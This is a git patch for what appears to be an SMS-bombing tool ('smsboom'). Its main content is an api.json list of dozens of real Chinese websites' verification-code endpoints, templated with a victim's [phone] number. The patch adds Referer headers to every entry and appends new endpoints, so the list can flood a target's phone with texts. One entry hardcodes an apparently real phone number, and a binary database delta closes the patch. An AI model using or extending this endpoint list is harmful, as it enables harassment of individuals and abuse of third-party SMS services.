From a19e4cf6ce1f4c58efdfb181a816444eac65b388 Mon Sep 17 00:00:00 2001 From: AdminWhaleFall Date: Tue, 3 May 2022 02:18:30 +0800 Subject: [PATCH 1/8] =?UTF-8?q?=E6=B7=BB=E5=8A=A06=E4=B8=AA=E6=8E=A5?= =?UTF-8?q?=E5=8F=A3?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .github/workflows/run.yaml | 0 .gitignore | 0 GETAPI.json | 0 LICENSE | 0 Pipfile | 0 Pipfile.lock | 0 api.json | 337 ++++++++++++++++++++++------ debug/api.db | Bin debug/api.js | 0 debug/api_tou.json | 0 debug/hz-web.json | 0 debug/spider-api.py | 0 debug/test-1.py | 0 debug/tou_api.py | 0 debug/touapi.json | 0 flask_app/__init__.py | 0 flask_app/data.db | Bin 40960 -> 45056 bytes flask_app/model.py | 0 flask_app/static/test.js | 0 flask_app/templates/admin_back.html | 0 flask_app/templates/api_edit.html | 0 flask_app/utils.py | 0 flask_app/views/__init__.py | 0 flask_app/views/error.py | 0 flask_app/views/views.py | 0 img/GIF111.gif | Bin img/cmd1.png | Bin img/cmd2.png | Bin img/e.g.1.png | Bin img/smsboom-logo.png | Bin img/test.gif | Bin img/test2.gif | Bin img/webui-test-2.png | Bin img/webui-test.png | Bin index.py | 0 requirements-dev.txt | Bin requirements.txt | Bin run_flask_app.py | 0 smsboom.py | 0 smsboom_pyinstall.py | 0 utils.py | 0 41 files changed, 269 insertions(+), 68 deletions(-) mode change 100644 => 100755 .github/workflows/run.yaml mode change 100644 => 100755 .gitignore mode change 100644 => 100755 GETAPI.json mode change 100644 => 100755 LICENSE mode change 100644 => 100755 Pipfile mode change 100644 => 100755 Pipfile.lock mode change 100644 => 100755 api.json mode change 100644 => 100755 debug/api.db mode change 100644 => 100755 debug/api.js mode change 100644 => 100755 debug/api_tou.json mode change 100644 => 100755 debug/hz-web.json mode change 100644 => 100755 debug/spider-api.py mode change 100644 => 100755 debug/test-1.py mode change 100644 => 100755 debug/tou_api.py mode change 100644 => 100755 debug/touapi.json mode change 100644 => 100755 flask_app/__init__.py mode change 100644 => 100755 flask_app/data.db mode change 100644 => 100755 flask_app/model.py mode change 100644 => 100755 flask_app/static/test.js mode change 100644 => 100755 flask_app/templates/admin_back.html mode change 100644 => 100755 flask_app/templates/api_edit.html mode change 100644 => 100755 flask_app/utils.py mode change 100644 => 100755 flask_app/views/__init__.py mode change 100644 => 100755 flask_app/views/error.py mode change 100644 => 100755 flask_app/views/views.py mode change 100644 => 100755 img/GIF111.gif mode change 100644 => 100755 img/cmd1.png mode change 100644 => 100755 img/cmd2.png mode change 100644 => 100755 img/e.g.1.png mode change 100644 => 100755 img/smsboom-logo.png mode change 100644 => 100755 img/test.gif mode change 100644 => 100755 img/test2.gif mode change 100644 => 100755 img/webui-test-2.png mode change 100644 => 100755 img/webui-test.png mode change 100644 => 100755 index.py mode change 100644 => 100755 requirements-dev.txt mode change 100644 => 100755 requirements.txt mode change 100644 => 100755 run_flask_app.py mode change 100644 => 100755 smsboom.py mode change 100644 => 100755 smsboom_pyinstall.py mode change 100644 => 100755 utils.py diff --git a/.github/workflows/run.yaml b/.github/workflows/run.yaml old mode 100644 new mode 100755 diff --git a/.gitignore b/.gitignore old mode 100644 new mode 100755 diff --git a/GETAPI.json b/GETAPI.json old mode 100644 new mode 100755 diff --git a/LICENSE b/LICENSE old mode 100644 new mode 100755 diff --git a/Pipfile b/Pipfile old mode 100644 new mode 100755 diff --git a/Pipfile.lock b/Pipfile.lock old mode 100644 new mode 100755 diff --git a/api.json b/api.json old mode 100644 new mode 100755 index fadfd6e..d5cfd49 --- a/api.json +++ b/api.json @@ -16,7 +16,9 @@ "desc": "网易云游戏", "url": "https://n.cg.163.com/api/v1/phone-captchas/86-[phone]", "method": "POST", - "header": "", + "header": { + "Referer": "https://n.cg.163.com/api/v1/phone-captchas/86-[phone]" + }, "data": { "etc": { "validate": "" @@ -52,42 +54,54 @@ "desc": "微爱app", "url": "http://api.welove520.com/v5/account/phone/verifyCode/send?phone_number=[phone]&client_id=464847866_[timestamp]&type=6&area_code=86&app_key=ac5f34563a4344c4&sig=xvP64W04tR%2FNJoZEJEoJySmlIXU%3D", "method": "POST", - "header": "", + "header": { + "Referer": "http://api.welove520.com/v5/account/phone/verifyCode/send?phone_number=[phone]&client_id=464847866_[timestamp]&type=6&area_code=86&app_key=ac5f34563a4344c4&sig=xvP64W04tR%2FNJoZEJEoJySmlIXU%3D" + }, "data": "" }, { "desc": "返利app(24小时限制)", "url": "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery21105357980471043338_[timestamp]&mobile=[phone]&countrycode=86&mobilestep=1&_=[timestamp]", "method": "GET", - "header": "", + "header": { + "Referer": "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery21105357980471043338_[timestamp]&mobile=[phone]&countrycode=86&mobilestep=1&_=[timestamp]" + }, "data": "" }, { "desc": "酷安(一天只能一次)", "url": "https://account.coolapk.com/auth/login?type=mobile", "method": "POST", - "header": "", + "header": { + "Referer": "https://account.coolapk.com/auth/login?type=mobile" + }, "data": "submit=1&requestHash=c2592a6dr9x510&country=86&mobile=[phone]&captcha=&randomNumber=0undefined7952784010774208" }, { "desc": "广东高考报名web", "url": "https://pg.eeagd.edu.cn/ks/public/kszc/zcyzm.jsmeb", "method": "POST", - "header": "", + "header": { + "Referer": "https://pg.eeagd.edu.cn/ks/public/kszc/zcyzm.jsmeb" + }, "data": "[phone]" }, { "desc": "广东教育翔云", "url": "https://gl.gdedu.gov.cn/api-service/captcha?phoneNumber=[phone]&captchaType=QUERY_ADMIN", "method": "GET", - "header": "", + "header": { + "Referer": "https://gl.gdedu.gov.cn/api-service/captcha?phoneNumber=[phone]&captchaType=QUERY_ADMIN" + }, "data": "" }, { "desc": "迪卡侬", "url": "https://www.decathlon.com.cn/zh/ajax/rest/model/atg/userprofiling/ProfileActor/send-mobile-verification-code", "method": "POST", - "header": "", + "header": { + "Referer": "https://www.decathlon.com.cn/zh/ajax/rest/model/atg/userprofiling/ProfileActor/send-mobile-verification-code" + }, "data": { "countryCode": "CN", "mobile": "[phone]" @@ -97,7 +111,9 @@ "desc": "股海网", "url": "https://www.guhai.com.cn/front/member/sendSmsCode", "method": "POST", - "header": "", + "header": { + "Referer": "https://www.guhai.com.cn/front/member/sendSmsCode" + }, "data": { "mobile": "[phone]" } @@ -106,7 +122,9 @@ "desc": "LLL的个人blog", "url": "http://www.lll.plus/sendCode/", "method": "POST", - "header": "", + "header": { + "Referer": "http://www.lll.plus/sendCode/" + }, "data": { "tel": "[phone]", "forgetPwd": "" @@ -116,7 +134,9 @@ "desc": "企米子", "url": "https://www.xcxui.com/index/register/getcode.html", "method": "POST", - "header": "", + "header": { + "Referer": "https://www.xcxui.com/index/register/getcode.html" + }, "data": { "tel": "[phone]" } @@ -125,7 +145,9 @@ "desc": "蒲公英", "url": "https://id.pgyer.com/user/getRegisterCode", "method": "POST", - "header": "", + "header": { + "Referer": "https://id.pgyer.com/user/getRegisterCode" + }, "data": { "tel": "[phone]", "callingCode": "86", @@ -136,7 +158,9 @@ "desc": "百卓优采", "url": "https://erp.abiz.com/mobilecode/sendMobileCode", "method": "POST", - "header": "", + "header": { + "Referer": "https://erp.abiz.com/mobilecode/sendMobileCode" + }, "data": { "mobile": "[phone]", "captcha": "" @@ -146,7 +170,9 @@ "desc": "云背篓", "url": "https://brand.yunbeilou.com/index.php/smssend", "method": "POST", - "header": "", + "header": { + "Referer": "https://brand.yunbeilou.com/index.php/smssend" + }, "data": { "phone": "[phone]", "v": "yes" @@ -156,7 +182,9 @@ "desc": "PHP中文网", "url": "https://m.php.cn/account/phone_code.html", "method": "POST", - "header": "", + "header": { + "Referer": "https://m.php.cn/account/phone_code.html" + }, "data": { "phone": "[phone]" } @@ -165,7 +193,9 @@ "desc": "12321", "url": "http://dhba.12321.cn/api/verifycode", "method": "POST", - "header": "", + "header": { + "Referer": "http://dhba.12321.cn/api/verifycode" + }, "data": { "phone": "[phone]" } @@ -174,7 +204,9 @@ "desc": "Testin众测", "url": "https://www.ztestin.com/users/send/vercode", "method": "POST", - "header": "", + "header": { + "Referer": "https://www.ztestin.com/users/send/vercode" + }, "data": { "phone": "[phone]", "type": "register", @@ -185,7 +217,9 @@ "desc": "海尔", "url": "http://maker.haier.net/client/user/sendregistervcode.html", "method": "POST", - "header": "", + "header": { + "Referer": "http://maker.haier.net/client/user/sendregistervcode.html" + }, "data": { "account": "[phone]" } @@ -194,7 +228,9 @@ "desc": "飞猫云", "url": "https://www.feimaoyun.com/index.php/invite/h5sendmsg", "method": "POST", - "header": "", + "header": { + "Referer": "https://www.feimaoyun.com/index.php/invite/h5sendmsg" + }, "data": { "pcode": "+86", "phone": "[phone]" @@ -204,7 +240,9 @@ "desc": "华觉数字化平台", "url": "https://end.huajuetech.com/api/sendCode", "method": "POST", - "header": "", + "header": { + "Referer": "https://end.huajuetech.com/api/sendCode" + }, "data": { "mobile": "[phone]", "email": "null", @@ -215,7 +253,9 @@ "desc": "问政江西", "url": "https://wenz.jxnews.com.cn/ms/index.php/Home/User/get_yzm", "method": "POST", - "header": "", + "header": { + "Referer": "https://wenz.jxnews.com.cn/ms/index.php/Home/User/get_yzm" + }, "data": { "phone": "[phone]" } @@ -224,7 +264,9 @@ "desc": "河南智慧党建", "url": "http://api.hndyjyfw.gov.cn/djapi/mobileVerify", "method": "POST", - "header": "", + "header": { + "Referer": "http://api.hndyjyfw.gov.cn/djapi/mobileVerify" + }, "data": { "phone": "[phone]", "verifytype": "1" @@ -234,7 +276,9 @@ "desc": "陆陆陆云安全", "url": "https://cloud.666idc.com/index/login/sendsms.html", "method": "POST", - "header": "", + "header": { + "Referer": "https://cloud.666idc.com/index/login/sendsms.html" + }, "data": { "mobile": "[phone]", "mobile_pre": "86" @@ -244,7 +288,9 @@ "desc": "网易", "url": "https://dz.blizzard.cn/action/user/mobile/captcha", "method": "POST", - "header": "", + "header": { + "Referer": "https://dz.blizzard.cn/action/user/mobile/captcha" + }, "data": { "mobile": "[phone]" } @@ -253,7 +299,9 @@ "desc": "码云社", "url": "https://www.codeseeding.com/loginUser/toSend", "method": "POST", - "header": "", + "header": { + "Referer": "https://www.codeseeding.com/loginUser/toSend" + }, "data": { "phone": "[phone]" } @@ -262,7 +310,9 @@ "desc": "人才山东", "url": "http://sso.rcsd.cn/regist/getVerifyCode", "method": "POST", - "header": "", + "header": { + "Referer": "http://sso.rcsd.cn/regist/getVerifyCode" + }, "data": { "personcall": "[phone]" } @@ -271,7 +321,9 @@ "desc": "水利部", "url": "http://sso.mwr.cn/suserRegister/verifyAccountAndphone.action", "method": "POST", - "header": "", + "header": { + "Referer": "http://sso.mwr.cn/suserRegister/verifyAccountAndphone.action" + }, "data": { "mobile": "[phone]" } @@ -280,7 +332,9 @@ "desc": "七联大学", "url": "http://ut7.whu.edu.cn/Home/studentCommon/Student_getVerifyCode", "method": "POST", - "header": "", + "header": { + "Referer": "http://ut7.whu.edu.cn/Home/studentCommon/Student_getVerifyCode" + }, "data": { "phoneNumber": "[phone]", "sendType": "0" @@ -290,7 +344,9 @@ "desc": "闪德资讯", "url": "https://www.0101ssd.com/user/sendmsg", "method": "POST", - "header": "", + "header": { + "Referer": "https://www.0101ssd.com/user/sendmsg" + }, "data": { "mobile": "[phone]", "event": "register" @@ -300,7 +356,9 @@ "desc": "江苏省名师空中课堂", "url": "https://mskzkt.jse.edu.cn/baseApi/user/code/", "method": "POST", - "header": "", + "header": { + "Referer": "https://mskzkt.jse.edu.cn/baseApi/user/code/" + }, "data": { "mobile": "[phone]", "type": "1" @@ -310,7 +368,9 @@ "desc": "CSFF短片", "url": "https://csff.cutv.com/wapi/users/sendregcode", "method": "POST", - "header": "", + "header": { + "Referer": "https://csff.cutv.com/wapi/users/sendregcode" + }, "data": { "telphone": "[phone]" } @@ -319,7 +379,9 @@ "desc": "广西人社厅", "url": "http://rswb.gx12333.net/member/getRegisterphoneCode.jspx", "method": "POST", - "header": "", + "header": { + "Referer": "http://rswb.gx12333.net/member/getRegisterphoneCode.jspx" + }, "data": { "aae005": "[phone]", "aac003": "刘萌萌", @@ -331,7 +393,9 @@ "desc": "麦克赛尔数字映像", "url": "https://www.maxell-dm.cn/Code/CheckImage.aspx", "method": "POST", - "header": "", + "header": { + "Referer": "https://www.maxell-dm.cn/Code/CheckImage.aspx" + }, "data": { "action": "send", "txtMember_Name": "[phone]" @@ -341,7 +405,9 @@ "desc": "宝提分", "url": "http://main.jiajiaozaixian.com//reginfo/sendRankByMobileReginfo.action", "method": "POST", - "header": "", + "header": { + "Referer": "http://main.jiajiaozaixian.com//reginfo/sendRankByMobileReginfo.action" + }, "data": { "mobile": "[phone]" } @@ -350,7 +416,9 @@ "desc": "选型系统", "url": "http://www.cnppump.ltd/Service/UserHandler.ashx", "method": "GET", - "header": "", + "header": { + "Referer": "http://www.cnppump.ltd/Service/UserHandler.ashx" + }, "data": { "cmd": "GetTelVerifyCode", "Tel": "[phone]" @@ -360,7 +428,9 @@ "desc": "千里马网信科技", "url": "http://vip.qianlima.com/rest/u/api/user/register/mobile/code", "method": "POST", - "header": "", + "header": { + "Referer": "http://vip.qianlima.com/rest/u/api/user/register/mobile/code" + }, "data": { "tips": "1", "shouji": "[phone]" @@ -370,7 +440,9 @@ "desc": "保定云", "url": "https://baodingyun.com.cn/register/send_registerSMS.html", "method": "POST", - "header": "", + "header": { + "Referer": "https://baodingyun.com.cn/register/send_registerSMS.html" + }, "data": { "phone": "[phone]" } @@ -379,7 +451,9 @@ "desc": "欢动游戏", "url": "http://www.gm5.com/auth/registerSms.html", "method": "POST", - "header": "", + "header": { + "Referer": "http://www.gm5.com/auth/registerSms.html" + }, "data": { "mobile": "[phone]" } @@ -388,7 +462,9 @@ "desc": "迈威", "url": "https://www.maiwe.com.cn/index/sendcode.html", "method": "GET", - "header": "", + "header": { + "Referer": "https://www.maiwe.com.cn/index/sendcode.html" + }, "data": { "tel": "[phone]" } @@ -397,42 +473,54 @@ "desc": "憨鼠社区", "url": "https://www.dehua.net/include/ajax.php?service=siteConfig&action=getphoneVerify&type=signup&phone=[phone]&areaCode=86", "method": "GET", - "header": "", + "header": { + "Referer": "https://www.dehua.net/include/ajax.php?service=siteConfig&action=getphoneVerify&type=signup&phone=[phone]&areaCode=86" + }, "data": {} }, { "desc": "天鹅到家", "url": "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", "method": "GET", - "header": "", + "header": { + "Referer": "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112" + }, "data": {} }, { "desc": "诺达筑工", "url": "http://ks.ndzhugong.com/getVerificationCode?phone=[phone]&password=&smscode=", "method": "GET", - "header": "", + "header": { + "Referer": "http://ks.ndzhugong.com/getVerificationCode?phone=[phone]&password=&smscode=" + }, "data": {} }, { "desc": "栋才智慧", "url": "http://211.149.170.226:8201/dczp-cloud-client/rrs/user/sendSms?[phone]&[phone]&smsMode=2", "method": "GET", - "header": "", + "header": { + "Referer": "http://211.149.170.226:8201/dczp-cloud-client/rrs/user/sendSms?[phone]&[phone]&smsMode=2" + }, "data": {} }, { "desc": "工伤预防网上培训平台", "url": "http://wf.zhuanjipx.com:8084//api-user/zjUsersPersonal/getSmsCode?mobile=[phone]&mobileCodeId=a87c9338-43a1-66ea-8ce7-1b1ac7c39d69", "method": "GET", - "header": "", + "header": { + "Referer": "http://wf.zhuanjipx.com:8084//api-user/zjUsersPersonal/getSmsCode?mobile=[phone]&mobileCodeId=a87c9338-43a1-66ea-8ce7-1b1ac7c39d69" + }, "data": {} }, { "desc": "济宁专技", "url": "https://sdjn-web.yxlearning.com/sendphoneCode.gson", "method": "POST", - "header": "", + "header": { + "Referer": "https://sdjn-web.yxlearning.com/sendphoneCode.gson" + }, "data": { "phone": "[phone]", "sendType": "4" @@ -442,14 +530,18 @@ "desc": "宁夏伊地地质工程有限公司", "url": "http://www.yddzgc.com/bid-app/api/sys/code?phone=[phone]&type=1", "method": "GET", - "header": "", + "header": { + "Referer": "http://www.yddzgc.com/bid-app/api/sys/code?phone=[phone]&type=1" + }, "data": {} }, { "desc": "青春大学说", "url": "http://zycp.qcdxs.com:5001/sms/sendsms", "method": "POST", - "header": "", + "header": { + "Referer": "http://zycp.qcdxs.com:5001/sms/sendsms" + }, "data": { "phone_number": "[phone]" } @@ -458,7 +550,9 @@ "desc": "兴业利达电子招投标平台", "url": "https://api.gzxyld.cn/HuiEbid/HuiEbidServer/doSendSms/getSms", "method": "POST", - "header": "", + "header": { + "Referer": "https://api.gzxyld.cn/HuiEbid/HuiEbidServer/doSendSms/getSms" + }, "data": { "username": "[phone]", "type": "regUser", @@ -469,7 +563,9 @@ "desc": "火象", "url": "https://v1.alphazone-data.cn/academy/api/v1/sendsms", "method": "POST", - "header": "", + "header": { + "Referer": "https://v1.alphazone-data.cn/academy/api/v1/sendsms" + }, "data": { "temp": "1", "phone": "[phone]" @@ -479,7 +575,9 @@ "desc": "中科教育", "url": "https://www.vipexam.cn/user/identifyingCode.action", "method": "POST", - "header": "", + "header": { + "Referer": "https://www.vipexam.cn/user/identifyingCode.action" + }, "data": { "phone": "[phone]" } @@ -488,14 +586,18 @@ "desc": "聚题库", "url": "https://uc.csdhe.com/v1/sms/send?mobile=[phone]&apptype=examWeb", "method": "GET", - "header": "", + "header": { + "Referer": "https://uc.csdhe.com/v1/sms/send?mobile=[phone]&apptype=examWeb" + }, "data": {} }, { "desc": "苏州高新区教育局", "url": "https://jssnd.edu.cn/apiu/v1/register/auth", "method": "POST", - "header": "", + "header": { + "Referer": "https://jssnd.edu.cn/apiu/v1/register/auth" + }, "data": { "phone": "[phone]" } @@ -504,14 +606,18 @@ "desc": "专业技术人员继续教育平台", "url": "http://zhuanjipx.com:8082//api-user/zjUsersPersonal/getSmsCode?mobile=[phone]&mobileCodeId=685110c6-cef4-bb01-8f4d-19ea89f4d3f8", "method": "GET", - "header": "", + "header": { + "Referer": "http://zhuanjipx.com:8082//api-user/zjUsersPersonal/getSmsCode?mobile=[phone]&mobileCodeId=685110c6-cef4-bb01-8f4d-19ea89f4d3f8" + }, "data": {} }, { "desc": "泰安专技", "url": "https://sdta-web.yxlearning.com/sendphoneCode.gson", "method": "POST", - "header": "", + "header": { + "Referer": "https://sdta-web.yxlearning.com/sendphoneCode.gson" + }, "data": { "phone": "[phone]", "sendType": "4" @@ -521,7 +627,9 @@ "desc": "漏洞银行", "url": "https://www.bugbank.cn/api/verifymobile", "method": "POST", - "header": "", + "header": { + "Referer": "https://www.bugbank.cn/api/verifymobile" + }, "data": { "mobile": "[phone]" } @@ -530,7 +638,9 @@ "desc": "中国劳动保障新闻网", "url": "https://www.clssn.com/jhxtapi/web/Login/sendSmsCode", "method": "POST", - "header": "", + "header": { + "Referer": "https://www.clssn.com/jhxtapi/web/Login/sendSmsCode" + }, "data": { "mobile": "[phone]" } @@ -539,7 +649,9 @@ "desc": "广东省心理学会", "url": "http://gpa-gd.scnu.edu.cn/member/index/public_send_code.html", "method": "POST", - "header": "", + "header": { + "Referer": "http://gpa-gd.scnu.edu.cn/member/index/public_send_code.html" + }, "data": { "phone": "[phone]" } @@ -548,7 +660,9 @@ "desc": "费耘网", "url": "https://www.feeclouds.com/homepage/register/send", "method": "POST", - "header": "", + "header": { + "Referer": "https://www.feeclouds.com/homepage/register/send" + }, "data": { "mobile": "[phone]" } @@ -570,14 +684,18 @@ "desc": "甜糖app", "url": "http://tiantang.mogencloud.com/web/api/login/code?phone=[phone]", "method": "POST", - "header": "", + "header": { + "Referer": "http://tiantang.mogencloud.com/web/api/login/code?phone=[phone]" + }, "data": "" }, { "desc": "网心云APP", "url": "https://account-box.onethingpcs.com/xluser.core.login/v3/sendsms", "method": "POST", - "header": "", + "header": { + "Referer": "https://account-box.onethingpcs.com/xluser.core.login/v3/sendsms" + }, "data": { "protocolVersion": "301", "sequenceNo": "1000001", @@ -604,21 +722,27 @@ "desc": "乐教乐学", "url": "http://id.lejiaolexue.com/api/sendvericode.ashx?phone=[phone]", "method": "GET", - "header": "", + "header": { + "Referer": "http://id.lejiaolexue.com/api/sendvericode.ashx?phone=[phone]" + }, "data": "" }, { "desc": "云杏HIS系统(九明珠)", "url": "http://www.yhis999.cn/yunhis/register.do?act=lable&type=yzm", "method": "POST", - "header": "", + "header": { + "Referer": "http://www.yhis999.cn/yunhis/register.do?act=lable&type=yzm" + }, "data": "{'lxdh': [phone]}" }, { "desc": "秘塔写作", "url": "https://xiezuocat.com/verify?type=signup", "method": "POST", - "header": "", + "header": { + "Referer": "https://xiezuocat.com/verify?type=signup" + }, "data": { "phone": "86-[phone]" } @@ -627,35 +751,45 @@ "desc": "CNMO 网站", "url": "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18306147606011785998_[timestamp]&mobile=[phone]&type=5&_=[timestamp]", "method": "POST", - "header": "", + "header": { + "Referer": "http://passport.cnmo.com/index.php?c=Member_Ajax_Register&m=SendMessageCode&Jsoncallback=jQuery18306147606011785998_[timestamp]&mobile=[phone]&type=5&_=[timestamp]" + }, "data": "" }, { "desc": "DR钻戒web", "url": "https://elove.darryring.com/api/crm/newGwLogin/getSMSValidCode?phone=[phone]&type=login", "method": "GET", - "header": "", + "header": { + "Referer": "https://elove.darryring.com/api/crm/newGwLogin/getSMSValidCode?phone=[phone]&type=login" + }, "data": "" }, { "desc": "有享云商web", "url": "https://mallapi.yofogo.com/biz-mall-application/v1/user/verifyCode/getVerifyCode?phone=[phone]&descriptionType=1&codeType=2", "method": "GET", - "header": "", + "header": { + "Referer": "https://mallapi.yofogo.com/biz-mall-application/v1/user/verifyCode/getVerifyCode?phone=[phone]&descriptionType=1&codeType=2" + }, "data": "" }, { "desc": "研才教育app", "url": "https://mall.yancais.com/api/sms/send?phone=[phone]", "method": "GET", - "header": "", + "header": { + "Referer": "https://mall.yancais.com/api/sms/send?phone=[phone]" + }, "data": "" }, { "desc": "成卓科技", "url": "https://callphone.hnczkj.cn/app_api/json/sendSms", "method": "POST", - "header": "", + "header": { + "Referer": "https://callphone.hnczkj.cn/app_api/json/sendSms" + }, "data": { "phone": "[phone]", "product": "biyingdianhua_ios", @@ -666,7 +800,9 @@ "desc": "加密电话", "url": "https://m.4009991000.com/valNumQry.action", "method": "POST", - "header": "", + "header": { + "Referer": "https://m.4009991000.com/valNumQry.action" + }, "data": { "appType": "1", "app_id": "5555", @@ -676,5 +812,70 @@ "v": "4.9.2", "validType": "3" } + }, + { + "desc": "快应用美抽", + "url": "http://users.seeyouyima.com/xiaomi/connect/?action=getCaptcha&v=2.1.0&app_id=11&platform=7&myclient=1172100000&account=[phone]", + "method": "POST", + "header": { + "Referer": "http://users.seeyouyima.com/xiaomi/connect/?action=getCaptcha&v=2.1.0&app_id=11&platform=7&myclient=1172100000&account=[phone]" + }, + "data": "" + }, + { + "desc": "小叶子app", + "url": "https://dss.xiaoyezi.com/student_app/auth/validate_code?mobile=[phone]&country_code=86", + "method": "GET", + "header": { + "Referer": "https://dss.xiaoyezi.com/student_app/auth/validate_code?mobile=[phone]&country_code=86" + }, + "data": "" + }, + { + "desc": "牙e在线", + "url": "https://yae920.com/login/sendSMS?mobile=[phone]&smsType=02×tamp=[timestamp]", + "method": "POST", + "header": { + "Referer": "https://yae920.com/login/sendSMS?mobile=[phone]&smsType=02×tamp=[timestamp]" + }, + "data": "mobile=[phone]&smsType=02×tamp=[timestamp]" + }, + { + "desc": "某数图表web(存疑)", + "url": "https://dycharts.com/vis/auth/send_signin_sms_code", + "method": "POST", + "header": { + "Referer": "https://dycharts.com/vis/auth/send_signin_sms_code" + }, + "data": { + "phoneNo": "13809213237" + } + }, + { + "desc": "17k小说网app", + "url": "http://api.17k.com/user/mobile/[phone]/message?smsType=2&deviceFlag=64e538d8f0cff7bb107dd8c1fba0f5a2&cpsOpid=17Kxiaomi&_filterData=1&device_id=e0c0b30933e42492&channel=0&_versions=1280&merchant=17Kxiaomi&ua=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20M2102J2SC%20Build%2FRKQ1.200826.002%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F100.0.4896.127%20Mobile%20Safari%2F537.36&platform=2&manufacturer=Xiaomi&clientType=1&width=1080&appKey=4037465544&model=M2102J2SC&cpsSource=0&brand=Xiaomi&youthModel=0&height=2206", + "method": "GET", + "header": { + "Referer": "http://api.17k.com/user/mobile/[phone]/message?smsType=2&deviceFlag=64e538d8f0cff7bb107dd8c1fba0f5a2&cpsOpid=17Kxiaomi&_filterData=1&device_id=e0c0b30933e42492&channel=0&_versions=1280&merchant=17Kxiaomi&ua=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20M2102J2SC%20Build%2FRKQ1.200826.002%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F100.0.4896.127%20Mobile%20Safari%2F537.36&platform=2&manufacturer=Xiaomi&clientType=1&width=1080&appKey=4037465544&model=M2102J2SC&cpsSource=0&brand=Xiaomi&youthModel=0&height=2206" + }, + "data": "" + }, + { + "desc": "汇看点快应用", + "url": "https://grzx.brily.cn/api/utils/sendSmsCode?phone=[phone]&type=USER_REG", + "method": "POST", + "header": { + "Referer": "https://grzx.brily.cn/api/utils/sendSmsCode?phone=[phone]&type=USER_REG" + }, + "data": "" + }, + { + "desc": "核桃编程app", + "url": "https://api.hetao101.com/login/v2/account/oauth/verifyCode?phoneNumber=[phone]", + "method": "GET", + "header": { + "Referer": "https://api.hetao101.com/login/v2/account/oauth/verifyCode?phoneNumber=[phone]" + }, + "data": "" } ] \ No newline at end of file diff --git a/debug/api.db b/debug/api.db old mode 100644 new mode 100755 diff --git a/debug/api.js b/debug/api.js old mode 100644 new mode 100755 diff --git a/debug/api_tou.json b/debug/api_tou.json old mode 100644 new mode 100755 diff --git a/debug/hz-web.json b/debug/hz-web.json old mode 100644 new mode 100755 diff --git a/debug/spider-api.py b/debug/spider-api.py old mode 100644 new mode 100755 diff --git a/debug/test-1.py b/debug/test-1.py old mode 100644 new mode 100755 diff --git a/debug/tou_api.py b/debug/tou_api.py old mode 100644 new mode 100755 diff --git a/debug/touapi.json b/debug/touapi.json old mode 100644 new mode 100755 diff --git a/flask_app/__init__.py b/flask_app/__init__.py old mode 100644 new mode 100755 diff --git a/flask_app/data.db b/flask_app/data.db old mode 100644 new mode 100755 index a0f9e304cc60cffdad0a006766abeaf8e8801bd1..cfc461a69a0caae39e7dceaefb0737ceea86b060 GIT binary patch delta 2883 zcmcIm-EZ4e6nE0JNm{MdgvQsHG?0?6+G=0le1}=3>(-*BS-WK`NMl5feUn`3*oi;d zW(av1lNd~*tvbdKlVI$n5}LMBgkZ1@9uN;a@E;%^mS(&l9uVTG;@WP~ZPL^s)~kHj z*Y})z&hP%t@A%aB?o+?H=eBPtP!!cgzHQ{|p5GPQTA=9Xu5ao2hjMqXP~9s%zbsXZ z?&W&-3tQV=)>`X!>6GdE0(f@%`rKKn=QH>6Lg)Ciu)Wr`uZ!xO?i}iT(*KwLnqT(a z_1*MM`(E;{y0hLNybE65yQkytjvw0toK)I;M=#Wv$A(cCB-<&vn zCgC}2*iP4cvaw0qouMI>DJeNDA(L5K&6JR)@dY%Xm9(SPGU8xRL{nHm!xCTMqG1#X z#l?6Y2>E<0mt#Rp6ypM$&+#B1;bBlHYhz_Ba%?O$gL$QdgV{WmbfoU*b)I9_d}YZB z1O$)^fkY^T!Z2(mh;5OVWh8MRm?ar$Sdlf3g>eupA=P@O-{aNbxwLW;OA;S|!x0(; zAo;{cv24r)Li@S4 zsQ^q^KFVbYy@GNntXsQ;Vst1&#Sn#ORy~QdR|dW1pX2)8+l&P4V9efs}87w zgpsV<=fei4v8We077(QPayf;nTo{C6;bk_uDlJNiRdN!luG##V!Wv@}P(!kq)o?+^a+dHWD-bV- zj(ci}bvsR?Ekab$No?C{x*?JjvLs^5he=q>OIYM}WLpn7v}|%XXwzM-+RwOnbhOsy zIqh$9+TyWBYY34Ps<_148#wf11ch))(3t^(AYl|&K>840)=3t@DGt&sZG)DLSe#|o zVUGn%RR?4;9V5)KMsTg{no*^eJ0@12@dY||P(4??A1-v3_q)A!mMTBDFYK85-Aygb zS7!H&dTQHSFcj32GjvYHQk52DtG*dS$CAca0A@iV|pVCRj_ z5x?TQ)06JL(+zxXZ>nRdeYIU{^SaNtR_7~kc)WXEe=b#CbD6|y&e5q_+hISoyVmyv zMGdZe`t{1?w;SJGXe^#1$N6~GYvjOD2q5eSk$x}{+6iEi1<6Q^6st9A)VQBwYumS3 zVJyAVxOA>@`kVUg&+9kNH_k6MBY6bW%@*oone`3r{Xi^9D&N`f3?3tCpEazsiHg>* z&)&WEW#i`jTG|iS*Nx=W++=;-NM6lN*4K^X)!bx#-AG=|P1e_k%d10h(_y$nIG7AK z30LzS@=-5VwowCvE1%4*d~m(~@vXa;7pGBfSN-b6#)bL5CdnUNna2sm-|ThX6qMd% zFB^&j(tp_y48?liYE>JFg-wP@y;+^n8a0siQ_t7>w^5UWjdwpn^-GJ58@HSL|385; z*A>bN?*aASNYw6+877k9R?NOpKNYAYtb!%gTA%%@es%61krLPXlKHU4^xyi@y=rCS z2jfW)TEnmVSE|QRPy4qPP7y6R?YFe6ZZ?;H+7rDj^j89 zFBun=34vG@Bqk8rG+;b-CGY?fHwgr96E8e~G=a2~@s1Er6HeK9F!Z%Y=dW|l@0|1L 